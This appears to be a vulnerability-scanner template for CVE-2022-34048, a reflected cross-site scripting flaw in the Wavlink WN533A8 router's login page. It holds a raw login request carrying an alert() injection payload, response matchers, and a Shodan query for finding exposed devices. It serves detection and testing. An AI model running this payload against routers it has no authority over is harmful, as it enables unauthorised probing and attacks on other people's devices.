id: CVE-2022-34048 info: name: Wavlink WN533A8 - Cross-Site Scripting author: ritikchaddha severity: medium description: | Wavlink WN533A8 M33A8.V5030.190716 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the login_page parameter. reference: - https://www.exploit-db.com/exploits/50989 - https://nvd.nist.gov/vuln/detail/CVE-2022-34048 - https://drive.google.com/file/d/1xznFhH3w3TDN2RCdX62_ebylR4yaKmzf/view?usp=sharing - https://drive.google.com/file/d/1NI3-k3AGIsSe2zjeigl1GVyU1VpG1SV3/view?usp=sharing classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-34048 cwe-id: CWE-79 metadata: shodan-query: http.html:"Wavlink" verified: "true" tags: cve2022,wavlink,xss,router,edb,cve requests: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 Host: {{Hostname}} newUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x");alert(9);x=("&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en matchers-condition: and matchers: - type: word part: body words: - 'x");alert(9);x=("?login=0");' - type: word part: header words: - "text/html" - type: status status: - 200